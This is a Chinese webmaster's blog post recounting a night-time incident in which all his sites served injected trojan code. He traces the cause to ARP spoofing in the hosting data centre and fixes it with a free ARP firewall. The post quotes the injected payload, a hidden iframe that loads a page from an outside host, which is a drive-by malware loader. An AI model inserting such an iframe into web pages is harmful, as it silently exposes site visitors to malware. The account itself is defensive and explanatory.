服务器所有网站全部挂马,惊心动魄3个小时!

所属分类: 网站运营 / 建站经验 阅读数: 98
收藏 0 赞 0 分享

昨天晚上11点多了。正要睡觉,突然一个网友电话过来了。说网页吧出问题,被挂马了。我一听吓了一大跳!马上起床!

我进入网页吧一访问,真的挂马了,全部网页都有马出现<iframe src=http://s82mnl12.cn/cn4.htm width=50 height=0 border=0></iframe> ,然后马上登陆服务器,看源代码,晕了。没有发现有挂马的痕迹.为了怕影响网页吧的用户,先把网页吧这个网站停了.

马上问QQ上的几个做服务器的高手朋友,发现全部网页挂了个马,但是我打开网页看源文件却没有,怎么回事情?后来知道网页里没有 访问有马,说明机房内有ARP攻击,装 360安全卫士 有ARP防火墙 !

没管了.马上安装360,一提示,果然是ARP攻击,然后打开网页吧访问,郁闷.还是有木马.马上关闭.这里我要说一句,360的ARP简直就是垃圾,基本没用的。千万别用。用和没用是一样的!不过查出了ARP攻击的人的网卡地址.

然后半夜联系机房,告诉他们APR攻击的网卡,没用.那机房的说是新技术,不会查IP.不懂,要明天.我超郁闷!

没办法自己继续.继续网上找软件,找到了金山arp防火墙,需要的可以去网页吧下。如果你也被攻击的话。一安装,然后打开.没问题了。完全防御!最重要的是这个工具免费啊。

朋友总结:这个ARP攻击 不是代码的问题 是服务器输出后,经过网关的时候被加了代码 所以网页里是没有代码的 是被别的机器冒充了网关 转发修改了数据!

终于解决问题了,一看表凌晨2点30了.一起3个小时!惊心动魄啊!

如果站长你的站被挂马了,而在源代码里没有发现木马,你就应该怀疑是不是ARP攻击了。最直接的办法是告诉机房,要他们拨攻击的人的线.第二个办法就是安装金山arp防火墙!

金山arp防火墙下载: http://www./ruanjian/anquan/200806/6616.html
(转文章的朋友这个金山arp防火墙下载的连接别去掉了,因为很多人都需要这个软件,第二我打字也不容易,算是给我点点流量吧)

更多精彩内容其他人还在看

公司网站运营部门常用的报表格式

这些表格和数据专门给那种公司里的运营人员使用,主要用作网站运营的表格报表制作,很有用,完成的文件在最后有下载。
收藏 0 赞 0 分享

QQ群推广网站注意的细节问题

这次卢松松想通过详细讲解的方法,来说明我的这六种推广方式,相信会更有实际价值。
收藏 0 赞 0 分享

网站的发展方式和网站推广模式

先了解一下其他网站的发展方式,如何寻找适合自己的网站推广模式呢?
收藏 0 赞 0 分享

闲置的域名该怎么发挥下作用

为了不让闲置的域名成一种资源浪费,大致总结了以下几个常见的闲置域名的用法。
收藏 0 赞 0 分享

网站推广过程中需要注意得问题

如今网站推广的方法实在太多了,网站推广方法千篇一律,其实大家都在说,都在讲,但真正做好的却没有几人,这是为什么呢?
收藏 0 赞 0 分享

用虚拟主机做的网站如何迁移

建站经验:用虚拟主机做的网站如何迁移
收藏 0 赞 0 分享

经营一个成功得博客

如何有效经营一个博客?和群里的不少同志都讨论过这个问题。今天抽点时间写个总结吧,希望对大家有借鉴作用。
收藏 0 赞 0 分享

SEO B2B行业网站优化经验

B2B行业门户网站不同于小网站,页面的优化价值是逆向顺序,即最终页 》 专题页 》 栏目页 》 首页。
收藏 0 赞 0 分享

搜索引擎算法调整和被搜索引擎惩罚的解决方法

所有的搜索引擎优化人员手段百出,黑链,点击器,能刺激排名的方式漫天飞舞,被发挥得淋漓尽致。
收藏 0 赞 0 分享

中小型企业网站网站内容更新策略

现在看到许多中小型的企业网站不仅在展示公司本身的产品与形象,同时也会经常更新一些与本行业或企业有关的内容,那么作为企业网站到底需要更新一些什么内容呢?
收藏 0 赞 0 分享
查看更多